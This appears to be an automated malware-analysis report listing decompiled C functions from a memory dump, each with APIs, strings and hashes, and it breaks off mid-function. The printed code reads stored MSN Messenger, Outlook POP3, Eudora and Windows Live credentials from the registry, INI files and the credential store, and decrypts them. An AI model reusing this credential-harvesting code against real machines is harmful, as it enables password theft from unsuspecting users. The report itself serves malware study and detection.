				int _v16;
				void* _v20;
				int _v24;
				char* _v28;
				char _v32;
				char _v556;
				char _v557;
				char _v1578;
				void _v1580;
				void* __edi;
				void* __esi;
				long _t39;
				int _t43;
				char _t48;
				char* _t63;
				int* _t67;

				_t63 = __ebx;
				_t67 = 0;
				_v16 = 0;
				_v12 = 0x400;
				_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
				if(_t39 != 0) {
					L13:
					RegCloseKey( *_a4);
					return _v16;
				}
				_t43 = _t39 + 1;
				if(_v12 <= _t43) {
					goto L13;
				}
				_t74 = _v1580 - 0x20;
				_v8 = 0;
				if(_v1580 >= 0x20) {
					_v8 = _t43;
					L10:
					if(_v8 != _t67) {
						_v557 = 0;
						E00401380( &_v1580,  &(_t63[0x100]), 0xff);
						_v8 = 0xff;
						_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
						if(_t48 == 0) {
							_t63[0xfe] = _t48;
							_t63[0x1fe] = _t48;
							_v16 = 1;
						}
					}
					goto L13;
				}
				_t69 =  &_v556;
				E004046D7( &_v556);
				if(E004047A0(_t69, _t74) == 0) {
					L8:
					E004047F1( &_v556);
					_t67 = 0;
					goto L10;
				}
				_v32 = _v12 + 0xfffffffe;
				_v28 =  &_v1578;
				if(E00404811(_t69,  &_v32, 0,  &_v24) == 0) {
					goto L8;
				}
				if(_v24 < 0x400) {
					memcpy( &_v1580, _v20, _v24);
					_v8 = 1;
				}
				LocalFree(_v20);
				goto L8;
			}

0x0040d4a6
0x0040d4bf
0x0040d4cf
0x0040d4d2
0x0040d4d5
0x0040d4dd
0x0040d5c7
0x0040d5cc
0x0040d5d8
0x0040d5d8
0x0040d4e3
0x0040d4e7
0x00000000
0x00000000
0x0040d4ed
0x0040d4f4
0x0040d4f7
0x0040d56d
0x0040d570
0x0040d573
0x0040d587
0x0040d58e
0x0040d5a7
0x0040d5aa
0x0040d5b2
0x0040d5b4
0x0040d5ba
0x0040d5c0
0x0040d5c0
0x0040d5b2
0x00000000
0x0040d573
0x0040d4f9
0x0040d4ff
0x0040d50b
0x0040d55e
0x0040d564
0x0040d569
0x00000000
0x0040d569
0x0040d513
0x0040d51c
0x0040d532
0x00000000
0x00000000
0x0040d537
0x0040d546
0x0040d54e
0x0040d54e
0x0040d558
0x00000000

APIs

RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,74B5F420), ref: 0040D4D5
RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040D5AA

Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726

Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,74B5F420), ref: 004047A8
Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0

memcpy.MSVCRT ref: 0040D546
LocalFree.KERNEL32(?,?,00000000,?), ref: 0040D558
RegCloseKey.ADVAPI32(?), ref: 0040D5CC

Strings

, xrefs: 0040D4ED
User.NET Messenger Service, xrefs: 0040D5A0
Password.NET Messenger Service, xrefs: 0040D4C3

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
String ID: $Password.NET Messenger Service$User.NET Messenger Service
API String ID: 3289975857-105384665
Opcode ID: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
Instruction ID: 7f1cec63b8765f81c3836bbc11e71f1516ceea0880c28a2d93855dc55ce36bd3
Opcode Fuzzy Hash: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
Instruction Fuzzy Hash: AE314DB1D01219AFDB11DF94CC44BDEBBB9AF48318F1040B6E905B7290D6789B94CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040706C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040706C(void* __ecx, intOrPtr* _a4, intOrPtr _a8, char _a12) {
				char _v12;
				short* _v16;
				char _v20;
				char* _v24;
				char _v28;
				char _v288;
				char _v544;
				char _v800;
				char _v1056;
				char _v1584;
				void _v2607;
				char _v2608;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t36;
				void* _t63;
				char* _t66;
				void* _t68;

				_t63 = __ecx;
				_v2608 = 0;
				memset( &_v2607, 0, 0x3ff);
				_v12 = 0x400;
				_v1056 = 0;
				_v800 = 0;
				_v544 = 0;
				_v288 = 0;
				_t36 = E0040EBA3(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12);
				_t72 = _t36;
				if(_t36 != 0) {
					return _t36;
				}
				_t67 =  &_v1584;
				E004046D7( &_v1584);
				if(E004047A0( &_v1584, _t72) != 0) {
					_v24 =  &_v2608;
					_v28 = _v12;
					_t16 =  &_v20; // 0x407221
					if(E00404811(_t67,  &_v28, 0, _t16) != 0) {
						_t19 =  &_v20; // 0x407221
						 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16,  *_t19 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0;
						LocalFree(_v16);
						E0040EB80(0xff, _t63, _a8, "POP3_name",  &_v800);
						E0040EB80(0xff, _t63, _a8, "POP3_host",  &_v288);
						_t28 =  &_a12; // 0x407221
						_t66 =  &_v1056;
						E004060D0(0xff, _t66,  *_t28);
						 *((intOrPtr*)( *_a4))(_t66);
					}
				}
				return E004047F1( &_v1584);
			}

0x0040706c
0x00407087
0x0040708d
0x004070a5
0x004070ac
0x004070b2
0x004070b8
0x004070be
0x004070c4
0x004070cc
0x004070ce
0x00407199
0x00407199
0x004070d4
0x004070da
0x004070e6
0x004070f2
0x004070f8
0x004070fb
0x0040710d
0x0040711d
0x00407131
0x00407138
0x00407154
0x0040716a
0x0040716f
0x00407172
0x00407178
0x00407188
0x00407188
0x0040710d
0x00000000

APIs

memset.MSVCRT ref: 0040708D

Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9

Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726

Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,74B5F420), ref: 004047A8
Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0

WideCharToMultiByte.KERNEL32(00000000,00000000,?,!r@,?,000000FD,00000000,00000000,?,00000000,!r@,?,?,?,?,00000000), ref: 00407128
LocalFree.KERNEL32(?,?,?,?,?,00000000,74B5ED80,?), ref: 00407138

Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B

Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA

Strings

POP3_name, xrefs: 00407145
POP3_host, xrefs: 00407160
POP3_credentials, xrefs: 0040709D
!r@, xrefs: 0040716F
!r@, xrefs: 004070FB, 0040711D, 004070FE, 00407122

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
String ID: !r@$!r@$POP3_credentials$POP3_host$POP3_name
API String ID: 604216836-250559020
Opcode ID: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
Instruction ID: f8ca724a3b3a12fba31c48434a973b8369f3aae8d57bdfed2f45406e53e98f37
Opcode Fuzzy Hash: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
Instruction Fuzzy Hash: C331707194021CAFDB11EB698C81ADE7BBCEF19344F0084B6FA05A2281D6389B598F65

Uniqueness

Uniqueness Score: -1.00%

Function 00405E46, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
stringlibrarywindowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405E46(long __edi, char* _a4) {
				char _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t1 = _t24 - 0x834; // -2100
				_t8 = 0;
				_t14 = 0x1100;
				if(_t1 <= 0x383) {
					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageA(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = strcpy(_a4, "Unknown Error");
				} else {
					if(strlen(_v8) < 0x400) {
						strcpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}

0x00405e46
0x00405e4c
0x00405e54
0x00405e5c
0x00405e61
0x00405e6b
0x00405e73
0x00405e75
0x00405e75
0x00405e73
0x00405e91
0x00405ec0
0x00405e93
0x00405e9e
0x00405ea6
0x00405eac
0x00405eb0
0x00405eb0
0x00405eca

APIs

LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F65,?,?), ref: 00405E6B
FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F65,?,?), ref: 00405E89
strlen.MSVCRT ref: 00405E96
strcpy.MSVCRT(?,?,?,?,00405F65,?,?), ref: 00405EA6
LocalFree.KERNEL32(?,?,?,00405F65,?,?), ref: 00405EB0
strcpy.MSVCRT(?,Unknown Error,?,?,00405F65,?,?), ref: 00405EC0

Strings

Unknown Error, xrefs: 00405EB8
netmsg.dll, xrefs: 00405E66

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
String ID: Unknown Error$netmsg.dll
API String ID: 3198317522-572158859
Opcode ID: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
Instruction ID: 3a45a8761f4bc18c8cc8ce1e33cdf84813ecacbbbbff7bb38409c5e389e3efd7
Opcode Fuzzy Hash: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
Instruction Fuzzy Hash: A901B131604118BAE7155B61ED46EDF7E6DDB14792B20443AF602F00A0DA785F409A98

Uniqueness

Uniqueness Score: -1.00%

Function 0040314D, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040314D(void* __eax, intOrPtr _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v188;
				char _v268;
				char _v524;
				void* __ebx;
				void* __edi;
				char* _t53;
				void* _t60;
				void* _t65;
				char* _t70;

				_v8 = _v8 & 0x00000000;
				_t65 = __eax;
				 *((intOrPtr*)(__eax + 0x8c)) = 3;
				 *((intOrPtr*)(__eax + 0x210)) = 1;
				E0040311F(_a4, "UsesIMAP",  &_v524, 0xff, _a8);
				if(_v524 == 0x31) {
					 *((intOrPtr*)(_t65 + 0x210)) = 2;
				}
				_v12 = _t65 + 0x110;
				E0040311F(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
				_t70 = _t65 + 0x214;
				E0040311F(_a4, "LoginName", _t70, 0x7f, _a8);
				E0040311F(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
				E0040311F(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
				E0040311F(_a4, "SavePasswordText",  &_v268, 0xff, _a8);
				if(_v268 != 0) {
					_v188 = 0;
					E00401D5A( &_v268, _t65 + 0x294);
					if( *_t70 == 0) {
						_push(_a8);
						_t60 = 0x7f;
						_push(_t60);
						_push(_t70);
						_push("PopAccount");
						_push(_a4);
						E0040311F();
						if( *_t70 != 0) {
							_t53 = strchr(_t70, 0x40);
							_a8 = _t53;
							if(_t53 != 0) {
								E004060D0(_t60, _v12,  &(_t53[1]));
								 *_a8 = 0;
							}
						}
					}
					_v8 = 1;
				}
				if( *_t70 != 0) {
					_v8 = 1;
				}
				return _v8;
			}

0x00403156
0x00403160
0x00403177
0x00403181
0x0040318b
0x00403197
0x00403199
0x00403199
0x004031b7
0x004031ba
0x004031c2
0x004031d3
0x004031e9
0x00403202
0x0040321a
0x00403226
0x00403234
0x0040323b
0x00403243
0x00403245
0x0040324a
0x0040324b
0x0040324c
0x0040324d
0x00403252
0x00403255
0x0040325d
0x00403262
0x0040326b
0x0040326e
0x00403275
0x0040327e
0x0040327e
0x0040326e
0x0040325d
0x00403281
0x00403281
0x0040328e
0x00403290
0x00403290
0x0040329b

APIs

Part of subcall function 0040311F: GetPrivateProfileStringA.KERNEL32(00000000,?,Function_00012466,?,?,?), ref: 00403143

strchr.MSVCRT ref: 00403262

Strings

SavePasswordText, xrefs: 00403212
RealName, xrefs: 004031E1
PopAccount, xrefs: 0040324D
1, xrefs: 00403190
UsesIMAP, xrefs: 0040316F
LoginName, xrefs: 004031CB
PopServer, xrefs: 004031AF
ReturnAddress, xrefs: 004031FA

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: PrivateProfileStringstrchr
String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
API String ID: 1348940319-1729847305
Opcode ID: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
Instruction ID: 1cfb9ddeec5dd782170234712f417fe000b4b626ad5f21becf6162a2306db812
Opcode Fuzzy Hash: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
Instruction Fuzzy Hash: 7631B370A04209BEEF119F20CC06FD97F6CAF14318F10816AF95C7A1D2C7B95B958B54

Uniqueness

Uniqueness Score: -1.00%

Function 0040F09D, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040F09D(char* __eax, void* __ecx) {
				void* _t2;
				char* _t3;
				void* _t5;
				void* _t6;
				void* _t7;

				_t3 = __eax;
				_t6 = __ecx;
				_t5 = 4;
				while(1) {
					_t2 =  *_t3;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t5);
					_push("&lt;");
					L14:
					_t2 = memcpy(_t6, ??, ??);
					_t7 = _t7 + 0xc;
					_t6 = _t6 + _t5;
					L16:
					if( *_t3 != 0) {
						_t3 = _t3 + 1;
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if(_t2 != 0xb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t6 = _t2;
										_t6 = _t6 + 1;
									} else {
										_push(_t5);
										_push("<br>");
										goto L14;
									}
								} else {
									_push(5);
									_push("&amp;");
									goto L11;
								}
							} else {
								_push(5);
								_push("&deg;");
								L11:
								_t2 = memcpy(_t6, ??, ??);
								_t7 = _t7 + 0xc;
								_t6 = _t6 + 5;
							}
						} else {
							_t2 = memcpy(_t6, "&quot;", 6);
							_t7 = _t7 + 0xc;
							_t6 = _t6 + 6;
						}
					} else {
						_push(_t5);
						_push("&gt;");
						goto L14;
					}
					goto L16;
				}
			}

0x0040f0a2
0x0040f0a4
0x0040f0a6
0x0040f0a7
0x0040f0a7
0x0040f0ab
0x00000000
0x00000000
0x0040f0ad
0x0040f0ae
0x0040f10a
0x0040f10b
0x0040f110
0x0040f113
0x0040f11a
0x0040f11d
0x0040f11f
0x00000000
0x0040f11f
0x0040f125
0x0040f0b5
0x0040f0b7
0x0040f0c3
0x0040f0dc
0x0040f0e9
0x0040f102
0x0040f117
0x0040f119
0x0040f104
0x0040f104
0x0040f105
0x00000000
0x0040f105
0x0040f0eb
0x0040f0eb
0x0040f0ed
0x00000000
0x0040f0ed
0x0040f0de
0x0040f0de
0x0040f0e0
0x0040f0f2
0x0040f0f3
0x0040f0f8
0x0040f0fb
0x0040f0fb
0x0040f0c5
0x0040f0cd
0x0040f0d2
0x0040f0d5
0x0040f0d5
0x0040f0b9
0x0040f0b9
0x0040f0ba
0x00000000
0x0040f0ba
0x00000000
0x0040f0b7

APIs

memcpy.MSVCRT ref: 0040F0CD
memcpy.MSVCRT ref: 0040F0F3
memcpy.MSVCRT ref: 0040F10B

Strings

<br>, xrefs: 0040F105
°, xrefs: 0040F0E0
", xrefs: 0040F0C7
&, xrefs: 0040F0ED
>, xrefs: 0040F0BA
<, xrefs: 0040F0AE

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
Instruction ID: 3259d816fa1e591736f6461b451ad75962e4f861ee845343ab42ffe8f3feec31
Opcode Fuzzy Hash: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
Instruction Fuzzy Hash: 450171B2E852A4B5DA350905AC07FA70B865BA6B11F350037F58639AC2E1AD0D8F516F

Uniqueness

Uniqueness Score: -1.00%

Function 0040D865, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040D865(intOrPtr* _a4) {
				char _v260;
				char _v516;
				void _v771;
				char _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v788;
				int _v796;
				char _v800;
				signed int _v804;
				char _v808;
				char _v812;
				void* __edi;
				void* __esi;
				intOrPtr* _t52;
				void* _t53;
				void* _t57;
				signed int _t58;
				char* _t65;
				unsigned int _t68;
				intOrPtr _t69;
				void* _t85;
				char* _t89;
				intOrPtr _t92;
				intOrPtr* _t93;
				signed int _t94;
				void* _t96;

				_t52 = _a4;
				_t96 = (_t94 & 0xfffffff8) - 0x32c;
				_push(_t85);
				 *((intOrPtr*)(_t52 + 4)) = 0;
				 *((intOrPtr*)(_t52 + 8)) = 0;
				_t89 = 0;
				_t53 = E00406278();
				_t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
				if( *((intOrPtr*)(_t53 + 4)) > 5) {
					_t89 = L"WindowsLive:name=*";
				}
				_v800 = 0;
				_v796 = 0;
				if(E00404647( &_v800, _t85, _t97) == 0) {
					L21:
					return E004046C2( &_v800);
				}
				_v808 = 0;
				_v812 = 0;
				if(_v780 == 0) {
					_t57 = 0;
					__eflags = 0;
				} else {
					_t57 = _v776(_t89, 0,  &_v812,  &_v808);
				}
				if(_t57 == 0) {
					goto L21;
				} else {
					_t58 = 0;
					_v804 = 0;
					if(_v812 <= 0) {
						L20:
						_v788(_v808);
						goto L21;
					} else {
						do {
							_t92 =  *((intOrPtr*)(_v808 + _t58 * 4));
							if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
								_v772 = 0;
								memset( &_v771, 0, 0xff);
								_t96 = _t96 + 0xc;
								if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
									_push(0x11);
									_t65 =  &_v772;
									_push("windowslive:name=");
									_push(_t65);
									L00411612();
									_t96 = _t96 + 0xc;
									if(_t65 == 0) {
										_v516 = 0;
										_v260 = 0;
										WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
										_t68 =  *(_t92 + 0x18);
										if(_t68 > 0) {
											WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
											 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;
										}
										if(_v260 == 0) {
											_t69 = _a4;
											_t44 = _t69 + 8;
											 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
											__eflags =  *_t44;
										} else {
											_t93 = _a4;
											 *((intOrPtr*)( *_t93 + 4))( &_v516);
											 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
										}
									}
								}
							}
							_t58 = _v804 + 1;
							_v804 = _t58;
						} while (_t58 < _v812);
						goto L20;
					}
				}
			}

0x0040d86b
0x0040d86e
0x0040d878
0x0040d879
0x0040d87c
0x0040d87f
0x0040d881
0x0040d886
0x0040d88a
0x0040d88c
0x0040d88c
0x0040d895
0x0040d899
0x0040d8a4
0x0040d9e7
0x0040d9f6
0x0040d9f6
0x0040d8ae
0x0040d8b2
0x0040d8b6
0x0040d8ca
0x0040d8ca
0x0040d8b8
0x0040d8c4
0x0040d8c4
0x0040d8ce
0x00000000
0x0040d8d4
0x0040d8d4
0x0040d8da
0x0040d8de
0x0040d9df
0x0040d9e3
0x00000000
0x0040d8e4
0x0040d8e9
0x0040d8ed
0x0040d8f4
0x0040d913
0x0040d917
0x0040d91c
0x0040d936
0x0040d93c
0x0040d93e
0x0040d942
0x0040d947
0x0040d948
0x0040d94d
0x0040d952
0x0040d964
0x0040d96d
0x0040d974
0x0040d97a
0x0040d97f
0x0040d994
0x0040d99f
0x0040d99f
0x0040d9ad
0x0040d9c6
0x0040d9c9
0x0040d9c9
0x0040d9c9
0x0040d9af
0x0040d9af
0x0040d9be
0x0040d9c1
0x0040d9c1
0x0040d9ad
0x0040d952
0x0040d936
0x0040d9d0
0x0040d9d5
0x0040d9d5
0x00000000
0x0040d8e9
0x0040d8de

APIs

Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292

memset.MSVCRT ref: 0040D917
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040D92E
_strnicmp.MSVCRT ref: 0040D948
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D974
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D994

Strings

windowslive:name=, xrefs: 0040D942
WindowsLive:name=*, xrefs: 0040D88C, 0040D8C3

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$Version_strnicmpmemset
String ID: WindowsLive:name=*$windowslive:name=
API String ID: 945165440-3589380929
Opcode ID: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
Instruction ID: 27d6d704735a973bd95cec350459a8e2137e61d4893fa240fc9d50cc053063f8
Opcode Fuzzy Hash: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
Instruction Fuzzy Hash: FD4183B1904345AFC720EF54D9849ABBBECEB84344F044A3EF995A3291D734DD48CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00407FEB, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00407FEB(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v259;
				char _v260;
				void _v4359;
				char _v4360;
				int _t17;
				CHAR* _t26;

				E004118A0(0x1104, __ecx);
				_v4360 = 0;
				memset( &_v4359, 0, 0x1000);
				_t17 = GetDlgCtrlID(_a4);
				_t35 = _t17;
				GetWindowTextA(_a4,  &_v4360, 0x1000);
				if(_t17 > 0 && _v4360 != 0) {
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					GetClassNameA(_a4,  &_v260, 0xff);
					_t26 =  &_v260;
					_push("sysdatetimepick32");
					_push(_t26);
					L004115B2();
					if(_t26 != 0) {
						E00407EC3(_t35,  &_v4360);
					}
				}
				return 1;
			}

0x00407ff3
0x0040800b
0x00408011
0x0040801c
0x00408022
0x0040802f
0x00408037
0x0040804f
0x00408055
0x00408068
0x0040806e
0x00408074
0x00408079
0x0040807a
0x00408083
0x0040808d
0x00408093
0x00408083
0x0040809b

APIs

memset.MSVCRT ref: 00408011
GetDlgCtrlID.USER32 ref: 0040801C
GetWindowTextA.USER32 ref: 0040802F
memset.MSVCRT ref: 00408055
GetClassNameA.USER32(?,?,000000FF), ref: 00408068
_stricmp.MSVCRT(?,sysdatetimepick32), ref: 0040807A

Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4

Strings

sysdatetimepick32, xrefs: 00408074

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
String ID: sysdatetimepick32
API String ID: 896699463-4169760276
Opcode ID: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
Instruction ID: 1a4d9fd07e56cfca2567f2ea4562d04845e15f14fd3b0b17285a92413f4c7fe9
Opcode Fuzzy Hash: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
Instruction Fuzzy Hash: 8811E3728040187EDB119B64DC81DEB7BACEF58355F0440BBFB49E2151EA789FC88B69

Uniqueness

Uniqueness Score: -1.00%

Function 00405715, Relevance: 12.2, APIs: 8, Instructions: 196
windowCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405715(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v16;
				void* __esi;
				void* _t74;
				void* _t75;
				signed int _t76;
				signed int _t89;
				signed int _t90;
				void* _t98;
				void* _t101;
				short* _t118;
				unsigned int _t126;
				intOrPtr _t128;
				signed int _t131;
				void* _t144;
				intOrPtr* _t146;
				short _t153;
				signed int _t155;

				_t129 = __ecx;
				_push(__ecx);
				_t74 = _a4 - 0x4e;
				_t155 = __ecx;
				if(_t74 == 0) {
					_t146 = _a12;
					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t146 + 8)) == 0xfffffffd) {
						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
						if(__eflags == 0) {
							E00404D42(__eflags,  *_t146,  *(_t146 + 0xc));
						}
					}
					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xffffff9b;
					if( *((intOrPtr*)(_t146 + 8)) != 0xffffff9b) {
						L27:
						_t75 = 0;
						__eflags = 0;
						goto L28;
					} else {
						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
						if( *((intOrPtr*)(_t146 + 4)) != 0x3e9) {
							goto L27;
						}
						_t76 =  *(_t146 + 0x14);
						__eflags = _t76 & 0x00000002;
						if((_t76 & 0x00000002) == 0) {
							L36:
							_t131 =  *(_t146 + 0x18) ^ _t76;
							__eflags = 0x0000f000 & _t131;
							if((0x0000f000 & _t131) == 0) {
								L39:
								__eflags =  *(_t146 + 0x14) & 0x00000002;
								if(( *(_t146 + 0x14) & 0x00000002) == 0) {
									goto L27;
								}
								__eflags =  *(_t146 + 0x18) & 0x00000002;
								if(( *(_t146 + 0x18) & 0x00000002) != 0) {
									goto L27;
								}
								__eflags =  *(_t146 + 0xc);
								E00401469(_t155, 0x3eb, 0 |  *(_t146 + 0xc) != 0x00000000);
								__eflags =  *(_t146 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 1;
								E00401469(_t155, 0x3ec, 0 |  *(_t146 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 0x00000001);
								 *((intOrPtr*)(_t155 + 0x14)) = 1;
								SetDlgItemInt( *(_t155 + 4), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) +  *(_t146 + 0x28) * 4), 0);
								 *((intOrPtr*)(_t155 + 0x14)) = 0;
								_t75 = 1;
								L28:
								return _t75;
							}
							L37:
							_t89 = E004048DC( *_t146,  *(_t146 + 0xc), 0xf002);
							__eflags = _t89 & 0x00000002;
							if((_t89 & 0x00000002) != 0) {
								_t90 = _t89 & 0x0000f000;
								__eflags = _t90 - 0x1000;
								_v8 = _t90;
								E00401469(_t155, 0x3ee, 0 | _t90 == 0x00001000);
								_v16 - 0x2000 = _v16 == 0x2000;
								E00401469(_t155, 0x3ef, 0 | _v16 == 0x00002000);
							}
							goto L39;
						}
						__eflags =  *(_t146 + 0x18) & 0x00000002;
						if(( *(_t146 + 0x18) & 0x00000002) == 0) {
							goto L37;
						}
						goto L36;
					}
				}
				_t98 = _t74 - 0xc2;
				if(_t98 == 0) {
					SendDlgItemMessageA( *(__ecx + 4), 0x3ed, 0xc5, 3, 0);
					E0040559F(_t155);
					goto L27;
				}
				_t101 = _t98 - 1;
				if(_t101 != 0) {
					goto L27;
				}
				_t126 = _a8 >> 0x10;
				if( *((intOrPtr*)(__ecx + 0x14)) != _t101 || _t126 != 0x300) {
					L7:
					if(_t126 != 0) {
						goto L27;
					}
					if(_a8 != 0x3f0) {
						L13:
						if(_a8 == 0x3eb) {
